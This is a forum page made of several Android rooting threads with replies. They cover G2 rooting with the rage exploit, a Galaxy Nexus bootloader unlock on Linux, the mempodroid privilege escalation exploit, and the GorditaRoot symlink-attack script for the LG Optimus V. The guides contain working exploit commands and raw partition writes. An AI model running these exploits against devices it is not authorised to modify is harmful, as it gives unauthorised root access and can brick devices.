Develop Bugs

[GUIDE] Temp to permanent root, using rage instead of visionary

There's already a guide here for obtaining permanent root using VISIONary, but some folks in #G2ROOT are having issues with the way that VISIONary modifies parititons. Using rage directly is a bit cleaner, since you know exactly what it's going to touch at each step of the way. I did NOT come up with any of this on my own, I'm building completely off of work that others have done. Speaking of which-
None of this would be possible without the tireless work that scotty2 put in. He stayed with the project for well over a month, through lots of smashed hopes and dead ends, until the solution was finally found. Were it not for his work, as well as the help of a few other key folks- we wouldn't be here. He deserves our thanks and some donations! We're talking hundreds of hours of work here, a couple bucks is not too much for that. His paypal is:
[email protected]​Send him some love! I'm not asking for anything myself, because I spent a half hour putting this together, and that doesn't deserve any donations!
[size=+2]G2 ROOT INSTRUCTIONS[/size]
=================================================
These are modified instructions based on the ones posted at http://bit.ly/g2root that use Visionary. A number of people have run into issues with the way that Visionary juggles around temporary partitions, and using the original root exploit is a much easier, and cleaner method for achieving permanent root. This tutorial will walk you through the rooting process by first achieving temporary root, and moving on to permanent root.
[size=+1]REQUIREMENTS[/size]
=================================================
Visionary disabled at boot or uninstalled completely
Android Terminal Emulator app
ADB
vision-combined-root.zip (Attached to this post, OR these two files: )
G2TempRoot.zip (http://forum.xda-developers.com/showthread.php?t=797042) NOTE: only download the files! Don't follow these instructions yet
vision-perm-root.zip (http://forum.xda-developers.com/showthread.php?t=833965) NOTE: again, just download the files from the thread.
In the commands to run below, $ or # represent the prompt and should NOT be entered as part of the commands.
[size=+2]VERY IMPORTANT![/size]​Visionary has caused filesystem corruption for some users during the rooting process. Before attempting the instructions below, make sure that you have "auto run on boot" turned OFF, and reboot your system. Since you will not need visionary anyway after this, you might as well just uninstall visionary and reboot NOW before doing anything.
[size=+1]TEMP ROOT[/size]
=================================================
ON YOUR PC:
Unzip the G2TempRoot files to a folder. From a cmd window or terminal, navigate to that folder and execute these commands:
Code:
$ adb push su /sdcard/su
$ adb push Superuser.apk /sdcard/Superuser.apk
$ adb push rage /data/local/tmp/rage
$ adb push busybox /data/local/tmp/busybox
$ adb push root /data/local/tmp/root
$ adb shell chmod 0755 /data/local/tmp/*
ON YOUR PHONE:
Launch Terminal Emulator
/data/local/tmp/rage
Wait for the message: "Forked #### childs."
Menu > Reset Term - Terminal Emulator will exit.
Launch Terminal Emulator, it Force Closes. Launch a second time, and you'll have a root shell
**NOTE**: in the original directions from the XDA thread, you are instructed to run the /data/local/tmp/root script here. DON'T do this
just yet. Leave the terminal window open.
[size=+1]PERM ROOT[/size]
=================================================
ON YOUR PC:
unzip the vision-perm-root.zip and navigate to that folder. There will be four files. You will need to push two of these to your phone- hboot-eng.img, and one of the wpthis-[..].ko files.
If you HAVE applied the OTA update, push wpthis-OTA.ko.
If you HAVE NOT applied the OTA update, push wpthis-pre-OTA.ko.
Code:
$ adb push hboot-eng.img /data/local
$ adb push wpthis-OTA.ko /data/local
ON YOUR PHONE:
You should still have terminal emulator up, at a root prompt. Now run:
Code:
# insmod /data/local/wpthis-OTA.ko
You should see:
Code:
init_module 'wpthis-OTA.ko' failed (Function not implemented)
That means it worked. This next step is CRUCIAL. You must make sure that you are writing to the proper partition here or you could brick your phone. To be absolutely clear- the partition is mmcblk(zero)p(one)(eight)
Code:
dd if=/data/local/hboot-eng.img of=/dev/block/mmcblk0p18
You should see some messages indicating that it was written. Next, run:
Code:
# /data/local/tmp/root
This will lock in root, and give you 'su' access in the future. Next, run:
Code:
# sync
Now wait at least a minute, just to be safe. After waiting, reboot your phone using the power button. After it finishes starting up, launch the terminal emulator, and type 'su'. You should get the prompt asking you to grant permissions. If you got the prompt, congratulations! You have permanent root!

I used these instructions and they worked brilliantly.
Sounds like it's a little safer than using VISIONary, which some people in the thread are reporting can get confused and not let you root because it thinks you already have root, etc.

I love it when a plan comes together. Perma-root. thanks man, i never had much luck getting visonary to work so this was spot on. worked like a charm

*not smart enough*
*leaves thread*
I really try to leave ADB out of the equation since I'm not comfortable navigating it.... I suppose I could dedicate my time to learning it, but it's not worth it since I would only use it once every two years to root my phone. In 16 hours I'm sure there will probably be a one click perm root method out anyway.

It worked flawlessly!
I always get so stressed when I root my phones, especially without tutorial vids.
I first did my G1 and that worked perfectly fine.
My second attempt at rooting was with my MT3G and that resulted in a bricked device because one of the lines of code was incorrect in the thread.
This, however, was clearly and plainly spelled out exactly to what happened to my phone.
I give you my thanks.

Awesome- glad to hear it's working well for people. If anybody sees areas that I could improve in the description just let me know.
sinistersai4d4d said:
I really try to leave ADB out of the equation since I'm not comfortable navigating it....
Click to expand...
Click to collapse
ADB is worth it IMHO because it makes moving files around easy, whether you're rooted or not. You don't have to turn on SD card storage, you can just do adb pull/push etc to grab or put files when you need them. Worth the effort. The one click root should be out within the next couple days though, you are right about that one.

trigeek,
I already perm rooted earlier, but just wanted to say you gave a very nicely detailed explanation that anyone should be able to follow. Well done!

Great guide. I liked it a lot more than Unforgivens just because it doesn't rely on VisionARY which might mess things up.

Guide worked absolutely great, no problems. I did not try the visionary method first, but for some reason I just felt safer doing it in adb.
Thank you!

Sorry for the noob question...? but does this mean we have fully rooted to G2 and now we can load ROMS on it when they come out ????
Edit: Nevermind I didnt see the sticky

RaffieKol said:
Sorry for the noob question...? but does this mean we have fully rooted to G2 and now we can load ROMS on it when they come out ????
Click to expand...
Click to collapse
You got it!

RaffieKol said:
Sorry for the noob question...? but does this mean we have fully rooted to G2 and now we can load ROMS on it when they come out ????
Edit: Nevermind I didnt see the sticky
Click to expand...
Click to collapse
Custome ROMs, custom Recovery...the whole 9 yards

Thanks for posting this, it was so easy!

Thank you so very much it was a success

this is my first rooting on an android device... im freaking out... but here i go.... if something happens i will just report my phone lost and get a new one i guess ahahah still... im scared.

Issues
I was temp rooted before using rage and then thru Visionary. But I decided to go back to stock till we have permanent root. I perm rooted today using this method. But I'm having the following issues:
1) adb remount
- remount failed: Operation not permitted
2) when using Root Explorer in /system, toggling Mount R/W does not work
- the only way to mount it R/O is thru terminal/adb shell. Once mounted R/O, the only way to mount R/W again is thru a reboot. Issuing mount -o remount ro /system either in terminal or adb shell does not work.

i actually changed my mind... im going to wait for a one click untended root i guess.... to scary...

joackie27 said:
I was temp rooted before using rage and then thru Visionary. But I decided to go back to stock till we have permanent root. I perm rooted today using this method. But I'm having the following issues:
1) adb remount
- remount failed: Operation not permitted
2) when using Root Explorer in /system, toggling Mount R/W does not work
- the only way to mount it R/O is thru terminal/adb shell. Once mounted R/O, the only way to mount R/W again is thru a reboot. Issuing mount -o remount ro /system either in terminal or adb shell does not work.
Click to expand...
Click to collapse
make sure you have debugging enabled.

juanshop said:
i actually changed my mind... im going to wait for a one click untended root i guess.... to scary...
Click to expand...
Click to collapse
Not gonna happen.

then i guess.... im going to jump in it.... wish me luck...

[Tutorial] Rooting Your Device in Linux

Root Galaxy Nexus (Either GSM or LTE) in Linux (Personally in Ubuntu)
Disclaimer: I am not at fault for anything you have done to your phone (ie. Brick, break, etc.). You are doing this at your own discression. I am merely stating what I did to unlock/root my phone.
Tutorial Broken Down Into Three Sections
I. Unlocking the bootloader
II. Installing Clockwork Mod Recovery
III. Installing SuperUser
Resources
1. Super User (used by flashing in Clockwork): http://download.clockworkmod.com/test/su.zip
You can get the latest version here: SuperUser by ChainsDD
2. Clockwork – based by carrier
1. Verizon (CDMA) version: CMW Galaxy Nexus
File name:*recovery-clockwork-5.5.0.4-toro.img
MD5:*b2d31c29b7ef785f9c0802a12264d322
File size:*5,263,360*(bytes)​
2. GSM version: CMW Galaxy Nexus
File name:*recovery-clockwork-5.5.0.2-maguro.img
MD5:*445887336a863573997ccbaeedddc984
File size:*5,427,200*(bytes)​
Unlocking Bootloader
Part 1: Unlock
1. First off, you need to download the adb drivers. There have been mentions of just getting the drivers, but I actually have the entire SDK. You can download it here. http://developer.android.com/sdk/index.html
2. Plug in your device, then open up Terminal (Ctrl + Alt + T) and type in: “lsusb” (without quotes). This will pull up all the devices plugged into your usb slots. Look for the one that says samsung (others have found google, but please make note).
3. Find the device, then find where it says ID. After where it says ID, it should have a number/letter mix such as “04e8” or such. Make note of that for later.
4. Go to http://developer.android.com/guide/developing/device.html . This will give the instructions on how to Install the device drivers (specific to each manufacturer). Start from where it says “4. Set up your system to detect your device.”
5. Go to your internal and cd to platform-tools. (This should include both adb and fastboot.) Put your phone into fast boot. (Do this by holding the power, volume up, and volume down buttons while phone is off).
6. Once in fastboot, go back to your computer and type in “sudo fastboot oem unlock”. This will bring up the option to unlock your phone's bootloader on your device's screen. It will give you a disclaimer, and it will say that if you unlock, it will wipe all of your phone's data. Scroll to Yes using the vol up or vol down buttons, and select it with the power button.
7. If you boot straight from there, you will go through a series of boot loops (it was 2 for me) then will be prompted to go through the process of setting up your Google account again. again.​
Congratulations, your phone is now unlocked. However, this doesn't mean that you have rooted your phone.
Rooting
Part 2: Putting Clockwork Mod Recovery On Your Phone
(do step one for preparation of Part 3)
1. First, we will want to push su.zip to your phone's Internal storage or “sdcard” partition. Open up Terminal and type the command “adb push 'directory_of_su.zip'/su.zip /sdcard/”. Hit enter/return and it should transfer over. (Based on the quality of usb cord, times of transfer may vary.)
To make this easier, put su.zip into the directory of adb. Then all you have to use for the command is “adb push su.zip /sdcard/”.​EDIT:
After you root, you have to delete /system/recovery-from-boot.p and reflash or else every time you reboot, the recovery partition will be written over by android. This can either be done in terminal (phone or comp) or by a file manager with root access (such as Root Explorer).
Reference: http://forum.xda-developers.com/showthread.php?t=1392336
Thanks vihil
2. Put your phone in fastboot mode again (vol up + vol down + power)
3. Go back to Terminal and type in “fastboot flash recovery 'whatever the file name is'”. This will flash CWM (Clockwork Mod) onto your phone, deleting your phone's stock recovery image.
EDIT: If it doesn't work, i.e. due to permissions, run with sudo​
Part 3: Flashing Super User onto your phone.
1. Next, go into Clockwork by hitting the volume up or down buttons till you see recovery mode. Hit the power button to enter Clockwork.
2. Scroll down (using volume buttons) till you get to “install zip from sd card”. Use the power button to select it.
3. Scroll down to “su.zip” and select it. Then, hit the selection for installing the zip file.
4. Go back using the “Go Back” selection to return to the main screen.
5. Reboot the system using the “reboot system”.​
Congratulations! You now have Root access!!!
Have fun with Flashing ROMs!
Special Thanks to scary alien on androidforums.com and jcarrz1 on XDA

Reserved
Reserved......

Thanks a lot I was looking for exactly this. Appreciated. Will try in a few hours when I get my phone.

Downloaded the sdk file but have no idea what to do. My windows computer died and it would be a lot easier on that to do all this but all I have is a computer with linux currently so if anyone would be kind enough to tell me how to install sdk I'd appreciate it. I seen the read me and seen it says execute "android" first but I don't know how to do that. I realize this is incredibly annoying to the xda hive mind trust me I hate needing help like this I'm nothing close to a noob as far as rooting flashing and all that good stuff I'm just unfortunately stuck with only Linux. I'd really really appreciate it.

under the tools folder there is a script called android, u can either run it in a terminal or hopefully if u were to click it, it was ask if u want to run it!

If you want to run it, you can just cd to it in terminal, then do "./android" and that should do the trick.
./ is the way you execute scripts in linux.

Seems like my fastboot is stuck on `waiting for device`. I have the fastboot screen on my GN.
Before rebooting into fastboot `adb devices` successfully showed a device (i.e., usb debugging is enabled, dunno whether it is needed for the unlocking):
$ fastboot oem unlock
< waiting for device >
Any idea?
EDIT: Found the solution. After doing a `fastboot devices` it told me "no permissions fastboot" so I needed to be root on my computer for it to work.

FadedLite said:
If you want to run it, you can just cd to it in terminal, then do "./android" and that should do the trick.
./ is the way you execute scripts in linux.
Click to expand...
Click to collapse
Thank you! That worked correctly and installed it. Now the next step to check the usb and if its there does not work, I might be entering this incorrectly but I typed just lsusb and enter nothing happened, held down ctrl, alt, t then typed in lsusb and nothing happened then just copied that entire part encase I was suppose to and got this.
[[email protected] ~]$ (Ctrl, Alt, T): lsusb
bash: syntax error near unexpected token `:'
Like I said I'm not expecting help because I know XDA doesn't like noobie questions, I will be greatly appreciative if you have patience with me and will even be willing to donate once I unlock the BL and root it. Thank you again.

C-4Nati said:
Thank you! That worked correctly and installed it. Now the next step to check the usb and if its there does not work, I might be entering this incorrectly but I typed just lsusb and enter nothing happened, held down ctrl, alt, t then typed in lsusb and nothing happened then just copied that entire part encase I was suppose to and got this.
[[email protected] ~]$ (Ctrl, Alt, T): lsusb
bash: syntax error near unexpected token `:'
Like I said I'm not expecting help because I know XDA doesn't like noobie questions, I will be greatly appreciative if you have patience with me and will even be willing to donate once I unlock the BL and root it. Thank you again.
Click to expand...
Click to collapse
You don't really need that step. Since '04e8' is Samsung and you have a Samsung device it will likely always be 04e8.
Part 1, 3. and 4. can be summarized as following:
Put the following line into /etc/udev/rules.d/51-android.rules:
SUBSYSTEM=="usb", ATTR{idVendor}=="04e8", MODE="0666", GROUP="plugdev"
Execute: chmod a+r /etc/udev/rules.d/51-android.rules
Type the following to verify it is working: "adb devices" It should display something like:
List of devices attached
01492B093401000F device
Part 1, 6. should probably changed to "sudo fastboot oem unlock"
Also, Part 2, 1. the preparation makes no sense to me: "(do step one for preparation of Part 3)". How can I go into Clockwork recovery before completing Part 2? Since Part 2 is about installing Clockwork...
Edit: And I just realised, C-4Nati, you should not write the "(Ctrl, Alt, T):" out.. that's just a shortcut to open a terminal. Just "lsusb" is fine. Then it should work.
---------- Post added at 11:33 AM ---------- Previous post was at 11:09 AM ----------
For anyone wondering why the step by step instructions in the OP do not work:
You need to flash the Clockwork recovery and install su.zip before you can remove the /system/recovery-from-boot.p (and if you follow that link provided it will cost you around $3.50 but you should be able to do it manually, will try to figure it out).
---------- Post added at 11:38 AM ---------- Previous post was at 11:33 AM ----------
(I couldn't find the /system/recovery-from-boot.p on my GN filesystem but maybe someone else does)
To remove /system/recovery-from-boot.p:
$ adb shell
$ su
# mount -o rw,remount -t ext4 /dev/block/platform/omap/omap_hsmmc.0/by-name/system /system
# rm /system/recovery-from-boot.p
# mount -o ro,remount -t ext4 /dev/block/platform/omap/omap_hsmmc.0/by-name/system /system

For simplicity, you can shorten that to: mount -o rw,remount /system
You can also delete it from a terminal on the phone or any file manager that allows root access. I think the free ES file explorer has root options.

vihil said:
You don't really need that step. Since '04e8' is Samsung and you have a Samsung device it will likely always be 04e8.
Part 1, 3. and 4. can be summarized as following:
Put the following line into /etc/udev/rules.d/51-android.rules:
SUBSYSTEM=="usb", ATTR{idVendor}=="04e8", MODE="0666", GROUP="plugdev"
Execute: chmod a+r /etc/udev/rules.d/51-android.rules
Type the following to verify it is working: "adb devices" It should display something like:
List of devices attached
01492B093401000F device
Part 1, 6. should probably changed to "sudo fastboot oem unlock"
Also, Part 2, 1. the preparation makes no sense to me: "(do step one for preparation of Part 3)". How can I go into Clockwork recovery before completing Part 2? Since Part 2 is about installing Clockwork...
Edit: And I just realised, C-4Nati, you should not write the "(Ctrl, Alt, T):" out.. that's just a shortcut to open a terminal. Just "lsusb" is fine. Then it should work.
---------- Post added at 11:33 AM ---------- Previous post was at 11:09 AM ----------
For anyone wondering why the step by step instructions in the OP do not work:
You need to flash the Clockwork recovery and install su.zip before you can remove the /system/recovery-from-boot.p (and if you follow that link provided it will cost you around $3.50 but you should be able to do it manually, will try to figure it out).
---------- Post added at 11:38 AM ---------- Previous post was at 11:33 AM ----------
(I couldn't find the /system/recovery-from-boot.p on my GN filesystem but maybe someone else does)
To remove /system/recovery-from-boot.p:
$ adb shell
$ su
# mount -o rw,remount -t ext4 /dev/block/platform/omap/omap_hsmmc.0/by-name/system /system
# rm /system/recovery-from-boot.p
# mount -o ro,remount -t ext4 /dev/block/platform/omap/omap_hsmmc.0/by-name/system /system
Click to expand...
Click to collapse
for needing to type in lsusb, i found that as somewhat of a precaution. I had seen on other threads that others had their device show up as either google or samsung. So i just figured rather check first instead of installing both or something.
for the preparation, basically you do that since your phone is already on. after flashing cwm, you would have to boot back into your phone, push the file to your sdcard, then boot back into recovery. All it does is that it saves just a bit of time.
As for the sudo fastboot, I didn't actually have to do that, but i'll add it, Thanks.
As for the cwm terminal commands, i'll add that as well. Thanks again.

FadedLite said:
Part 3: Flashing Super User onto your phone.
1. Next, go into Clockwork by hitting the volume up or down buttons till you see recovery mode. Hit the power button to enter Clockwork.
2. Scroll down (using volume buttons) till you get to “install zip from sd card”. Use the power button to select it.
3. Scroll down to “su.zip” and select it. Then, hit the selection for installing the zip file.
4. Go back using the “Go Back” selection to return to the main screen.
5. Reboot the system using the “reboot system”.​Congratulations! You now have Root access!!!
Have fun with Flashing ROMs!
Click to expand...
Click to collapse
not yet. after flashing su-bin-3.0.3.2-efghi-signed.zip (which is just the binary), the user still needs to flash Superuser-3.0.7-efghi-signed.zip, to have Superuser.apk placed in /system/app, otherwise GUI apps won't have access to su. (unless, of course, the zip you are linking here has them both)
It's preferable to have users linked to ChainsDD website, there people will find latest binaries and Superuser.apk. I also don't see any mention to him in the OP. Even if this is a tutorial, don't forget to give credit where needed.

Some help for an Ubuntu Noob/Not a Noob to Windows
Hi all,
Long story short, I no longer have Windows (nor a way to load Windows without a purchase; I'd rather not). So I have a fresh install of Ubuntu Linux 11.10. I have read this guide and some of the helpful responses and have yet to be able to get adb and fastboot up and running. I am beginning to understand the nuances of Ubuntu and have tackled adb and fastboot in Windows but Ubuntu is different. I would say I have put in two 12 hour sessions with no desire to pack it in and go back to Windows (I am avoiding a VM as well).
Here is where I seem to be stuck (mind you I have done a fresh install numerous times to start with a fresh playing field in case I have messed up something): Whether downloading the full SDK through Eclipse (cos I'd like to dev apps soon and why not have it?) or downloading the SDK on its own, I get it without fail. The steps leading up to entering in commands for terminal so that the computer recognizes either just my Nexus or a slew of OEMs are easy enough but maybe I am messing up. It is where getting the computer to see my device (udev steps) I can't seem to get it right. I have even looked at other guides for reference (most seem messy and convoluted) but keep coming back here.
I know you probably need more to go on and I am sooooooo willing to tell more. I just hope someone is down to help a brother out. Like I said, I just need some direction. I have manually rooted and all that jazz, just in windows. Thanks in advance for your help.
jmar

jmartino5920 said:
Hi all,
Long story short, I no longer have Windows (nor a way to load Windows without a purchase; I'd rather not). So I have a fresh install of Ubuntu Linux 11.10. I have read this guide and some of the helpful responses and have yet to be able to get adb and fastboot up and running. I am beginning to understand the nuances of Ubuntu and have tackled adb and fastboot in Windows but Ubuntu is different. I would say I have put in two 12 hour sessions with no desire to pack it in and go back to Windows (I am avoiding a VM as well).
Here is where I seem to be stuck (mind you I have done a fresh install numerous times to start with a fresh playing field in case I have messed up something): Whether downloading the full SDK through Eclipse (cos I'd like to dev apps soon and why not have it?) or downloading the SDK on its own, I get it without fail. The steps leading up to entering in commands for terminal so that the computer recognizes either just my Nexus or a slew of OEMs are easy enough but maybe I am messing up. It is where getting the computer to see my device (udev steps) I can't seem to get it right. I have even looked at other guides for reference (most seem messy and convoluted) but keep coming back here.
I know you probably need more to go on and I am sooooooo willing to tell more. I just hope someone is down to help a brother out. Like I said, I just need some direction. I have manually rooted and all that jazz, just in windows. Thanks in advance for your help.
jmar
Click to expand...
Click to collapse
Are you getting a "waiting on device" message or something similar when you run adb or fastboot?
Forget about the udev nonsense (not important really until you start developing full time) and just drop a sudo before your commands.
You can shoot me a PM or a gtalk (same username as my xda) if you want and I'd be more than happy to help you get your system going.

Thanks, still a bit more annoying that Windows but this tutorial makes it easy.

Sorry if this is ignorant, but can I use these instructions with Unix & terminal on Mac OS X? I'm thinking yes???

I rooted mine in linux as well... No problems. For some reason I was able to do it much easier though...
I did the fastboot oem unlock step above (Part 1). Rebooted then installed superuser from the android market. Then I installed Clockworkmod from the android market.
Done.
Not sure if I'm missing out on something by doing it this way but so far I've had no issues....

[HOW-TO] [GSM & CDMA] Root without Unlocking Bootloader via exploit (for 4.0.1/4.0.2)

[HOW-TO] [GSM & CDMA] Root without Unlocking Bootloader via exploit (for 4.0.1/4.0.2)
Edit: This does not works on anything newer than ICL53F (i.e., 4.0.2). It works fine on ITL41D (4.0.1), ITL41F (4.0.1) and ICL53F (4.0.2)
Once you have got root, you can now use segv11's BootUnlocker app to unlock your bootloader without wiping anything. Easy as pie!
Disclaimer: I take no credit for this exploit or the implementation of it (but I will take credit for the step-by step ). Thanks to kendong2 for pointing it out to me here.
So, it looks like zx2c4 has found a local privilege escalation exploit. See source here, and saurik has managed to package it together for Android. See here. Although this may be old news to some, I hadn't seen it before.
So what does this all mean:
If you are running a 2.6.39 kernel (or above), which all Galaxy Nexus' are, you can now root your device without having to unlock your bootloader (and without losing your data).
Moreover, you should now be able to root your device even if your hardware buttons are not working.
Additionally, this allows those who have not received an OTA update and want to apply it without having an unlocked bootloader or root to do so by copying the OTA update to /cache from /sdcard.
Notes:
1) This assumes that you have USB Debugging enable on your device (Settings > Developer Options > Enable USB Debugging) and the drivers for your device installed on your computer. For the drivers, I would recommend you remove all old drivers and install these. If you don't know how to install them, or are having issues, look here.
2) This needs to be done over ADB, as a terminal emulator on-device does not have the appropriate access. If you do not have ADB, I've attached it in the zip. Unzip all files.
3) Some users indicate that, once finished the procedure, they needed to open the Superuser app.
Step-by-step:
1) Download the attached files to your computer and unzip them in the same directory as your adb.exe file;
2) Open a command prompt in the same directory;
3) Copy the files to your device:
adb push mempodroid /data/local/tmp/mempodroid
adb push su /data/local/tmp/su
adb push Superuser.apk /data/local/tmp/Superuser.apk
4) Open a shell: adb shell
5) Change permission on mempodroid to allow it to run: chmod 777 /data/local/tmp/mempodroid
6) Run the exploit: ./data/local/tmp/mempodroid 0xd7f4 0xad4b sh
Note: Once you do step 6, your prompt should change from $ to #. If not, it did not work.
7) Mount the system partition as rw: mount -o remount,rw -t ext4 /dev/block/mmcblk0p1 /system
8) Copy su to /system: cat /data/local/tmp/su > /system/bin/su
9) Change permissions on su: chmod 06755 /system/bin/su
10) Copy Superuser.apk: cat /data/local/tmp/Superuser.apk > /system/app/Superuser.apk
11) Change permissions on Superuser.apk: chmod 0644 /system/app/Superuser.apk
12) Mount the system partition as r/o: mount -o remount,ro -t ext4 /dev/block/mmcblk0p1 /system
13) Rescind root: exit
14) Exit the ADB shell: exit
15) Done. You now should have root without having to unlock your bootloader.

Reserved

Reserved

This is the same as https://github.com/saurik/mempodroid
saurik ftw.

times_infinity said:
This is the same as https://github.com/saurik/mempodroid
saurik ftw.
Click to expand...
Click to collapse
Not sure what you are getting at? I mentioned saurik in the first post, and the link you posted is in the first post. And I mentioned that this may be old news, but I haven't seen it anywhere before today in the GN forums.

Yikes! This exploit works on any kernel from 2.6.39 and >. This could become a common root method for many devices. Linus Torvalds himself posted the fix commit! Nice work by zx2c4!

Sleuth255 said:
Yikes! This exploit works on any kernel from 2.6.39 and >. This could become a common root method for many devices. Linus Torvalds himself posted the fix commit! Nice work by zx2c4!
Click to expand...
Click to collapse
You need ics to have a vulnerable kernel version, so given the number of devices which currently have ics officially, I doubt it will be common. I'd also expect Google and vendors to correct this in next release.
Also many custom kernels don't have this flaw as they are at or over 3.0.18 or have patched it. This prevents gaining unnoticed root.
Sent from my Galaxy Nexus

Hmmm I thought 2.6.39 was found in GB builds. This exploit is almost a root fix for the Moto DX 4.5.621 fiasco. Unfortunately the kernel for that build is 2.6.32.9.
Sent from my Galaxy Nexus using xda premium

This was huge in the headlines a few weeks back. It's nice to see someone putting it to a good use!
Sent from my Galaxy Nexus using xda premium

Hi, been lurking awhile, registered to clear up somethings.
I did some research while attempting to access the /data/local/ -folder with terminal emulator and I found that it would be impossible to write or to find it while being unrooted. Rooting a phone through using an unrooted access root seems impossible.
Did I miss something or is there any other way to copy mempodroid to the data- folder? I sure would like to keep all my files.

Huxleysäl said:
Hi, been lurking awhile, registered to clear up somethings.
I did some research while attempting to access the /data/local/ -folder with terminal emulator and I found that it would be impossible to write or to find it while being unrooted. Rooting a phone through using an unrooted access root seems impossible.
Did I miss something or is there any other way to copy mempodroid to the data- folder? I sure would like to keep all my files.
Click to expand...
Click to collapse
I think you are mistaken. In a terminal emulator type: cd /data/local/tmp
Edit: Fixed a mistake made by auto correct...
Sent from my Galaxy Nexus using Tapatalk

efrant said:
I think you are mistaken. In a terminal emulator type: cd /data/local/temp
Sent from my Galaxy Nexus using Tapatalk
Click to expand...
Click to collapse
Just did. It says "No such file or directory."
Not the best source, but if you google it, people state what I state. Sorry, can't post links

try /data/local/tmp

Huxleysäl said:
Just did. It says "No such file or directory."
Not the best source, but if you google it, people state what I state. Sorry, can't post links
Click to expand...
Click to collapse
Sorry, damn auto correct. It should be: cd /data/local/tmp
Not "temp".
It works fine.
Edit: Sleuth255 beat me to it!
Sent from my Galaxy Nexus using Tapatalk

efrant said:
Sorry, damn auto correct. It should be: cd /data/local/tmp
Not "temp".
It works fine.
Edit: Sleuth255 beat me to it!
Sent from my Galaxy Nexus using Tapatalk
Click to expand...
Click to collapse
Sure, OK, it worked. But as I'm trying to replicate his instructions, copying mempodroid to data/local/tmp doesn't compute. I tried extracting the files, puting mempodroid in a new folder in ./sdcard/ (which I named Nex), and it still couldn't find it.
Wait, just had an idea. Brb

Huxleysäl said:
Sure, OK, it worked. But as I'm trying to replicate his instructions, copying mempodroid to data/local/tmp doesn't compute. I tried extracting the files, puting mempodroid in a new folder in ./sdcard/ (which I named Nex), and it still couldn't find it.
Wait, just had an idea. Brb
Click to expand...
Click to collapse
Hmm. Looks like you may be correct. In GB, we had write access to that directory, but it looks like we don't in ICS. I'll have another look tomorrow and try to figure something out.
Sent from my Galaxy Nexus using Tapatalk

OK, this is exactly what I did:
I downloaded the files, extracted them into the ./sdcard folder of my android. I opened the console, wrote exactly as stated. Reaction? Cannot create /data/local/tmp/mempodroid: Permission denied
So, what I'm thinking is this: I tried the cd ./sdcard/mempodroid, found it. So, logically, that should mean that since the permission is dennied, the problem lies not in where I put the mempodroid, but with my authority over my phone. So, here we are again. Could anybody smarter then me clarify?
efrant said:
Hmm. Looks like you may be correct. In GB, we had write access to that directory, but it looks like we don't in ICS. I'll have another look tomorrow and try to figure something out.
Sent from my Galaxy Nexus using Tapatalk
Click to expand...
Click to collapse
****, I was hoping I was wrong. I originally thought that the exploit was this. But alas.
Try finding an alternative write route to the /data/local/- folder. That should solve all problems, I guess. Big words, ey? This is for the simpletons like me, who stupidly forgot to bootload.

Might want to expand on the steps.
Like what program to use to copy the file.
How do you change permission.
How do you run the exploit.
How to mount rw.
How to copy su.

convolution said:
Might want to expand on the steps.
Like what program to use to copy the file.
How do you change permission.
How do you run the exploit.
How to mount rw.
How to copy su.
Click to expand...
Click to collapse
I hade my initial problems with that too. But as if this moment it doesn't really matter. Read above posts. Anyhow, to answer your question: you need to download a console emulator
Just search for it in the market. Also the commands go in this console
For example: cat /directory/filename > /newdirectory/samefilename means to copy or move from one place. To change permission you just write that line of code ending with 777 instead of cat and then the filename etc and etc.
I didn't know any of this 'till yesterday, so it is quite understandable.
cheers

Huxleysäl said:
F***, I was hoping I was wrong. I originally thought that the exploit was this. But alas.
Try finding an alternative write route to the /data/local/- folder. That should solve all problems, I guess. Big words, ey? This is for the simpletons like me, who stupidly forgot to bootload.
Click to expand...
Click to collapse
I've updated the first post. Give that a go and let me know how it turns out. (The guide may need some minor tweaking, but I am here to help you through it.)
It seems that ADB has rw access to /data/local/tmp but a terminal emulator on-device does not. So for now, you need to be plugged into your computer.
It may be possible to do this with ADB-over-Wi-Fi, but I haven't gotten there yet.

Gordita Root: Optimus V exploit March 24th 2012

This is an exploit, I take NO RESPONSIBILITY if this does ANYTHING bad, your fault not mine, it was only tested on the firmware mentioned below. If you redistribute it, republish, work it into a all in one click, please link back and PROPERLY credit me.
Tested on the
ro.build.date=Mon Jan 30 10:42:53 KST 2012
ro.build.version.incremental=ZV9.479A6632
Update for the VirginMobile LG Optimus V
Your phone needs to be updated to the above build, and potentially needs a factory reset before this works, but it works fine. This will allow you to flash recovery without being root. After flashing recovery, flash this zip http://dl.dropbox.com/u/8699733/rootme.zip to install su, superuser and disable re-flashing of the stock re covery
LinuxMac Script + files:
https://github.com/CunningLogic/GorditaRoot
Flash_image:
https://github.com/CunningLogic/GorditaRoot/blob/master/flash_image
Recovery:
http://www.mediafire.com/?vzc5k8taj9smmll (Credit BobZhome)
Windows users run the commands manually
GNU nano 2.2.2 File: Gordita.sh
Code:
#!/bin/sh
echo "GorditaRoot 1.0 by jcase / TeamAndIRC"
echo "for the VM670 Optimus V"
echo "March 21st 2012"
echo "Follow me! http://www.twitter.com/TeamAndIRC"
echo "Donations are optional http://forum.xda-developers.com/donatetome.php?u=2376614"
echo "-"
echo "Recovery taken from http://forum.xda-developers.com/showthread.php?t=1197991"
echo "-"
echo "Pushing recovery to /data/local/"
adb push VM670NH_recovery.img /data/local/recovery.img
adb push flash_image /data/local/
adb shell "chmod 755 /data/local/flash_image"
echo "Removing old sensor config, setting up symlink attack"
adb shell "rm /data/amit/*"
adb shell "ln -s /dev/mtd/mtd2 /data/amit/AMI304_Config.ini"
adb shell "ln -s /dev/mtd/mtd2 /data/amit/AMI304_Config2.ini"
echo "Rebooting to execute symlink attack, to chmod 666 the recovery block device"
adb reboot
adb wait-for-device
sleep 10
adb shell "rm /data/amit/*"
adb shell "/data/local/flash_image recovery /data/local/recovery.img"
echo "Recovery flashed! Enjoy"
Having trouble identifying whether or not you completed the root process? Quickly test for root access with Root Checker Basic

Confirmed working on a phone donated just for this purpose!
Started with stock firmware, Android 2.2.1, baseband VM670ZV4_60401001, generic android recovery
Flashed the VirginMobile Security Update from their website, became VM670ZV9_60401001 ZV9.479A6632
Manually walked through above script by jcase via gtalk, and using the exploit, was able to flash BobZhome's CWM for the VM670, reboot into it and made a backup.
Flashed the su zip, and all is well in Optimus V land again.
HUGE THANKS TO JCASE FOR TAKING THE TIME TO RE-ROOT THE VM670!!!

I only wish I understood what it all meant--so I could be excited, too!

wilberfan said:
I only wish I understood what it all meant--so I could be excited, too!
Click to expand...
Click to collapse
Means ppl who couldnt root before, now can

wilberfan said:
I only wish I understood what it all meant--so I could be excited, too!
Click to expand...
Click to collapse
i was gonna ask the same thing LOL

